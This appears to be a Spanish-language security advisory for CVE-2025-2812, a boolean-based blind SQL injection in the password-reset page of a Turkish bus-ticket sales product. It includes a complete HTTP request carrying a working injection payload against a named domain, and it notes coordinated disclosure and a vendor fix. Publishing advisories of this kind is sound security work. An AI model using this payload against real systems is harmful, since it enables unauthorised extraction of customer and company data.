
CVE-2025-2812 Inyección SQL
📌 CVE-ID: CVE-2025-2812
📢 Aviso USOM: tr-25-0099
🛡️ Tipo de vulnerabilidad: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 Producto afectado: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 URL de destino de ejemplo:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
En el producto "Bilet Satış Otomasyonu", se ha detectado una vulnerabilidad de inyección SQL ciega basada en booleanos (Boolean-based Blind SQL Injection) en el parámetro "Adınızın ilk harfi" (ilkHarf) de la página de restablecimiento de contraseña (SifremiUnuttum.php). Esta vulnerabilidad permite extraer datos del sistema sin necesidad de nombre de usuario ni contraseña.
Esta vulnerabilidad afecta a los sistemas de las siguientes empresas de autobuses:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarfTras la vulnerabilidad que detectamos en el producto "Bilet Satış Otomasyonu" desarrollado por "Mydata Bilişim Ltd. Şti", esta falla, anunciada con el código CVE-2025-2812, fue declarada en coordinación con el fabricante y USOM. Nos enorgullece contribuir a la comunidad de ciberseguridad en este proceso.
Tras la notificación de la vulnerabilidad, Mydata Bilişim Ltd. Şti aplicó rápidamente todos los procedimientos necesarios, cerró la falla de seguridad correspondiente e integró medidas de seguridad adicionales en sus sistemas. Agradecemos su transparencia, cooperación y sentido de responsabilidad durante el proceso.
Nos enorgullece contribuir a la comunidad de ciberseguridad en este proceso.
Puede contactarme para cualquier tipo de pregunta, comentario o colaboración: